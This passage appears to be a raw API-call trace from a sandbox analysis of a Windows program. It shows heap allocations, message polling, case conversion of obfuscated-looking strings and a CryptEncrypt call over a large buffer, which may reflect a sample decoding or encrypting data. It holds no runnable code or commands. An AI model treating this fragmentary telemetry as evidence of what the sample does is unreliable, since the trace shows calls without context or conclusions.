dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0263.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0263.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0263.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0263.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0263.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0263.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0263.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0263.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0263.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0263.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0264.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0264.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0264.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0264.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0264.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0264.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0264.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0264.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0264.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0264.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0264.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0264.001] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0264.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0264.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0264.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0264.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0264.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0264.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0264.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0264.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0264.001] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.001] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0264.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0264.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0264.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0264.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0264.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0264.002] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0264.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0264.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0264.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0264.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0264.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0264.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0264.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0264.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0264.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0264.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0264.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0264.003] CharLowerBuffW (in: lpsz="byte[82664]", cchLength=0xb | out: lpsz="byte[82664]") returned 0xb [0264.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0264.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0264.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0264.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0264.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0264.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0264.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0264.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0264.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0264.004] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0264.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0264.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0264.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0264.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0264.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0264.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0264.006] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0264.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0264.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0264.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0264.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0264.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0264.007] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.007] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0264.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0264.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0264.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0264.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0264.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0264.007] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.008] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.008] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0264.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0264.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0264.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0264.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0264.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0264.008] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0264.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0264.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0264.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0264.009] CryptEncrypt (in: hKey=0xaa5820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34c6540*, pdwDataLen=0x8bef68*=0x142e4, dwBufLen=0x142e8 | out: pbData=0x34c6540*, pdwDataLen=0x8bef68*=0x142e8) returned 1 [0264.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0264.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0264.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2190 [0264.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0264.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0264.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0264.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0264.011] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0264.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0264.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0264.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0264.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0264.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0264.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0264.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0264.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0264.011] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.011] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0264.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0264.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0264.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0264.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0264.012] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0264.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0264.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0264.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0264.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0264.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0264.013] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.014] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0264.014] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0264.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0264.014] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0264.014] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0264.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0264.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0264.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0264.015] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0264.015] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.015] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0264.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0264.015] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0264.015] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0264.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0264.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0264.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0264.016] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0264.016] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.016] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0264.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0264.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0264.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0264.016] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.016] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0264.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0264.017] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0264.017] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0264.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0264.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0264.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0264.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0264.017] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0264.017] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.017] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0264.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0264.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0264.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0264.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0264.018] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.018] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.018] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0264.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0264.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.024] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.025] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.025] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0264.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0264.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.027] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0264.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0264.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0264.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0264.028] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0264.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0264.028] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0264.028] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0264.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0264.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0264.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0264.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0264.029] 